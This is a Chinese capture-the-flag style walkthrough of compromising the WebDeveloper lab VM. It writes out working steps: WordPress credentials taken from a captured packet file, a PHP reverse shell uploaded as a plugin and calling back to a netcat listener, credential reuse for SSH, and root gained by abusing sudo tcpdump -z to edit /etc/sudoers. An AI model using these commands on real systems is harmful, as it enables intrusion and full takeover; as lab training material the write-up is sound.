WebDeveloper 靶机渗透
WebDeveloper 靶机渗透
WebDeveloper 靶机
确定主机 ip
arp-scan -l
信息收集
主机、端口扫描
root@kali:~# nmap -sS -Pn -A -p- 192.168.220.167
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 23:31 EDT
Nmap scan report for 192.168.220.167 (192.168.220.167)
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION 22/tcp open ssh
OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 4.9.8
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Example site – Just another WordPress site
MAC Address: 00:0C:29:27:68:CC (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS 1 0.70 ms 192.168.220.167 (192.168.220.167)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
扫描结果
端口 | 信息 |
---|---|
22 | OpenSSH 7.6p1 Ubuntu 4 |
80 | WordPress 4.9.8 网站系统 |
80 端口网站
网站目录扫描
dirb http://192.168.220.167/
发现 wordpress
的后台,还发现了一个 ipdata
目录打开之后是一个 wireshark
的数据包文 件,直接点击用 wireshark
打开(OK 按钮点亮需要切换到 Save File 再回到 Open)
使用 wireshark
分析数据包,可以发现 wordpress
登录的用户名和密码
Form item: "log" = "webdeveloper"
Form item: "pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"
登录 wordpress
后台成功:http://192.168.220.167/wp-login.php
发现后台的样式中 404.php
,这里修改为 shell
代码应该可以 getshell
。(后面测试没成功)
漏洞扫描
可以对发现的端口进行破解
端口功能 | 实施攻击 |
---|---|
22 端口 SSH | 暴力破解 |
80 端口网站 | 已经拿到后台用户名和密码,只需找到漏洞 getshell |
22 端口 SSH 破解
尝试获取到的用户名和密码进行登录 ssh,发现不能登录 webdeveloper Te5eQg&4sBS!Yr$)wf%(DcAd
80 端口 wordpress 网站漏洞扫描
Wordpress
常见漏洞分类:
1. 插件漏洞,样式漏洞(样式 404.php 页面)
2. 各种上传点: 上传插件,上传主题样式,媒体处上传文件
使用 wpscan
扫描网站漏洞,结果出乎意料,没有识别出 wordpress.
过了一段时间回来再次扫描,发现又可以了。。。,枚举一下插件、样式漏洞、后台用户名
wpscan --url http://192.168.220.167/ -e
只找到一个后台用户名,其他没有任何收获
使用 searchsploit
搜索 wordpress
漏洞,因为大多数情况下 wordpress 漏洞都在于插件, 查看后台插件:
搜索插件漏洞:只有一个,没有什么太大价值
上传插件试试,在插件列表上面点击 Add New
,增加插件,再点击更新插件(UpdatePlugin)
漏洞利用
利用 wordpress 后台 404.php 页面 GetShell 失败
登录后台找到 404.php
页面,修改代码
修改代码为 php-reverse-shell.php
修改代码中的 ip 地址以及端口,ip 为 kali 的,端口为 nc
监听的端口
修改完之后,更新文件,发现提示不能更新…
利用 wordpress
后台插件上传 GetShell
刚刚已经上传过文件,虽然提示有错误,但是心存侥幸,使用 dirb
重新扫描一下目录
发现了上传目录:
[http://192.168.220.167/wp-content/uploads/](http://192.168.220.167/wp-content/uploads/)
查看:
点开目录发现文件是在的
剩下的就是惯例拿 shell
- 使用 nc 监听
nc -lvp 1234
- 访问上传的文件
php-reverse-shell.php http://192.168.220.167/wp-content/uploads/2020/05/php-reverse-shell.php
- 用
python
切换bash
,python -c 'import pty; pty.spawn("/bin/bash")'
需要使用命令:
python3 -c 'import pty; pty.spawn("/bin/bash")'
4. 查看网站源码敏感信息
结合 ls 命令查看文件夹,最终找到网站根目录:/var/www/html
查看网站配置文件 wp-config.php
得到数据库密码:MasterOfTheUniverse
使用这个密码尝试登录 ssh,成功登录
提权
利用 SUID 权限程序提权失败
查找可以利用的 SUID 权限程序
find / -user root -perm -4000 -print 2>/dev/null
暂时没有发现可以利用的点(常见可利用程序:nmap,vim,find,bash,more,less,nano,cp)
利用 sudo 程序提权
使用 sudo -l 查看权限
可以看到在 webdeveloper
的 shell
中可以使用 sudo
直接以 root
权限启动 tcpdump
查看 tcpdump
命令帮助
-z 命令可以执行任意命令, -Z 可以指定用户
我们只需构造一个将当前用户添加为 root 权限的脚本,用 tcpdump 执行即可
- 制作将当前用户添加为 root 权限的脚本
echo 'echo "webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > /tmp/exp.sh
- 修改脚本权限
chmod +x /tmp/exp.sh
- 使用 tcpdump 执行脚本
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp.sh -Z root
命令解释
-i eth0
从指定网卡捕获数据包
-w /dev/null
将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command]
运行指定的命令
-Z [user]
指定用户执行命令
-G [rotate_seconds]
每rotate_seconds
秒一次的频率执行-w 指定的转储
-W [num]
指定抓包数量 - 使用
sudo
查看/root
文件夹以及flag
- 修改
/etc/shadow
文件中的 root 密码hash sudo vim /etc/shadow
切换到 root
用户,密码:MasterOfTheUniverse
小结
本节使用了以下工具:
arp-scan,nmap,dirb,wpscan,nc,tcpdump
本节涉及的漏洞:文件上传漏洞,目录遍历漏洞,权限配置问题漏洞
本节涉及的失败:
ssh 暴力破解失败
wordpress
后台 404.php
利用失败
利用 SUID
权限程序提权失败
领悟小结:
当没有思路时,请继续信息收集 多次尝试重新漏洞利用说不定有意外发现 失败不可怕,可怕的是失败了就放弃了